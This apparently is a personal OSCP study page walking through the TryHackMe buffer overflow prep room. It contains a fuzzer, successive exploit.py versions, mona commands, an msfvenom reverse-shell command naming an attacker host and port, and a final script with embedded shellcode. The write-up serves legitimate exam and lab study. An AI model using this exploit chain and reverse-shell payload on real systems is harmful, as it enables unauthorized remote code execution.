VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
      • Theory
        • Nmap
        • Wireless
        • OSI Model - TCP/IP
        • R* Service
        • Hash
        • Solaris
        • SIP
        • Cisco Password Encryption
        • Time to Live
        • Windows
          • WMIC
          • IIS Version
          • Windows Version
          • Active Directory
        • Linux
        • Database
          • Page 7
          • MSSQL
          • PostgreSQL
          • MySQL
        • Asymmetric Encryption
        • Symmetric Encryption
        • Tools
        • ICMP
        • IP Address
        • VLAN
        • Acronyms
        • HTTP Status
        • HTTP Method
        • Protocol
        • Common Ports
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • 1- Mona Configuration
  • 2- Fuzzing
  • 3- Crash Replication & Controlling EIP
  • 4- Finding Bad Characters
  • 5- Finding a Jump Point
  • 6- Generate Payload
  • 7- Prepend NOPs
  • 8- Exploit
  1. Course Review
  2. Cyber Security Courses Journey
  3. OSCP Journey
  4. CTF
  5. Buffer Overflow

BOF - Tib3rius

Trib3rius: https://tryhackme.com/room/bufferoverflowprep

1- Mona Configuration

First the first, you can set up mona module

!mona config -set workingfolder c:\mona\%p

2- Fuzzing

Create a file on your Kali box called fuzzer.py with the following contents:

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.202.33"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

We can see that the application crashed at the 2000 bytes. On immunity debugger, "Access Violation when executing 41414141"

Make sure to restart application every steps.

3- Crash Replication & Controlling EIP

Create another file on your Kali box called exploit.py with the following contents:

import socket

ip = "10.10.202.33"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

• Generate offset with length 400 bytes longer that the crashed string.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

• Copy the output and place it into the payload variable of exploit.py script.

import socket

ip = "10.10.202.33"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Once we executed the script, the application will be crashed again.

└─$ python3 2-exploit.py 
Sending evil buffer...
Done!

Once the application crashed, we can run mona command on the same length as the pattern we created.

!mona findmsp -distance 2400

The output should be like:

EIP contains normal pattern : ..... (offset xxxxx)

• let update our payload script and set the offset variable to the value (offset 1978) previously set to 0.

• Set the payload variable to empty.

• Set the retn variable to “BBBB”.

We can run the exploit.py script again and the EIP register should be overwritten with 4 B's (42424242).

import socket

ip = "10.10.202.33"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

4- Finding Bad Characters

Generate a bytearray using mona and exclude null byte \x00. The location bytearray.bin file will be in C:\mona\oscp\bytearray.bin.

!mona bytearray -b "\x00"

Now, we need to generate string of bad chars by python3 script

#!/usr/bin/env python3

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

• Update exploit.py script by set the payload variable to the string of bad chards.

import socket

ip = "10.10.202.33"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Once the application crashed, we can compare the address to which the ESP register points by mona command:

!mona compare -f C:\mona\oscp\bytearray.bin -a 01A2FA30

Note that all of these might not be badchars! We need to remove one by one and \x00 by default will be badchars.

We can run mona command to generate new bytearray.bin again and remove badchars on our exploit.py script.

!mona bytearray -b "\x00\x07"

Then we can perform comparison again with the same step with different ESP value.

!mona bytearray -b "\x00\x07\x2e\xa0"

We remove badchars one by one and compare until we reach to Unmodified status.

5- Finding a Jump Point

Let finds all "jmp esp" instructions with address that don't contain any of the badchars specified. (Log Data)

!mona jmp -r esp -cpb "\x00"

• choose an address with status "False". Set the value of address to “retn” variable with backwards (little endian) • example 0x625011af = \xaf\x11\x50\x62

6- Generate Payload

Generate reverse shell payload with specify badchars -b options

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.60.241 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

• Copy C code strings and set value on payload variable

7- Prepend NOPs

We need to add some space in memory for payload. We can add padding variable to 16 or more “No Operation” (\x90) bytes:

padding = “\x90” * 16

8- Exploit

import socket

ip = "10.10.202.33"
port = 1337

prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = ("\xba\x61\x67\xce\xe0\xdd\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x52\x31\x56\x12\x03\x56\x12\x83\xa7\x63\x2c\x15\xdb\x84\x32"
"\xd6\x23\x55\x53\x5e\xc6\x64\x53\x04\x83\xd7\x63\x4e\xc1\xdb"
"\x08\x02\xf1\x68\x7c\x8b\xf6\xd9\xcb\xed\x39\xd9\x60\xcd\x58"
"\x59\x7b\x02\xba\x60\xb4\x57\xbb\xa5\xa9\x9a\xe9\x7e\xa5\x09"
"\x1d\x0a\xf3\x91\x96\x40\x15\x92\x4b\x10\x14\xb3\xda\x2a\x4f"
"\x13\xdd\xff\xfb\x1a\xc5\x1c\xc1\xd5\x7e\xd6\xbd\xe7\x56\x26"
"\x3d\x4b\x97\x86\xcc\x95\xd0\x21\x2f\xe0\x28\x52\xd2\xf3\xef"
"\x28\x08\x71\xeb\x8b\xdb\x21\xd7\x2a\x0f\xb7\x9c\x21\xe4\xb3"
"\xfa\x25\xfb\x10\x71\x51\x70\x97\x55\xd3\xc2\xbc\x71\xbf\x91"
"\xdd\x20\x65\x77\xe1\x32\xc6\x28\x47\x39\xeb\x3d\xfa\x60\x64"
"\xf1\x37\x9a\x74\x9d\x40\xe9\x46\x02\xfb\x65\xeb\xcb\x25\x72"
"\x0c\xe6\x92\xec\xf3\x09\xe3\x25\x30\x5d\xb3\x5d\x91\xde\x58"
"\x9d\x1e\x0b\xce\xcd\xb0\xe4\xaf\xbd\x70\x55\x58\xd7\x7e\x8a"
"\x78\xd8\x54\xa3\x13\x23\x3f\xc6\xeb\x17\x4e\xbe\xe9\x67\xa1"
"\x63\x67\x81\xab\x8b\x21\x1a\x44\x35\x68\xd0\xf5\xba\xa6\x9d"
"\x36\x30\x45\x62\xf8\xb1\x20\x70\x6d\x32\x7f\x2a\x38\x4d\x55"
"\x42\xa6\xdc\x32\x92\xa1\xfc\xec\xc5\xe6\x33\xe5\x83\x1a\x6d"
"\x5f\xb1\xe6\xeb\x98\x71\x3d\xc8\x27\x78\xb0\x74\x0c\x6a\x0c"
"\x74\x08\xde\xc0\x23\xc6\x88\xa6\x9d\xa8\x62\x71\x71\x63\xe2"
"\x04\xb9\xb4\x74\x09\x94\x42\x98\xb8\x41\x13\xa7\x75\x06\x93"
"\xd0\x6b\xb6\x5c\x0b\x28\xd6\xbe\x99\x45\x7f\x67\x48\xe4\xe2"
"\x98\xa7\x2b\x1b\x1b\x4d\xd4\xd8\x03\x24\xd1\xa5\x83\xd5\xab"
"\xb6\x61\xd9\x18\xb6\xa3")
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Let start netcat listener on port 4444 and execute python script.

PreviousBuffer OverflowNextBOF - TCM

Last updated 2 years ago

👨‍🎓
🚩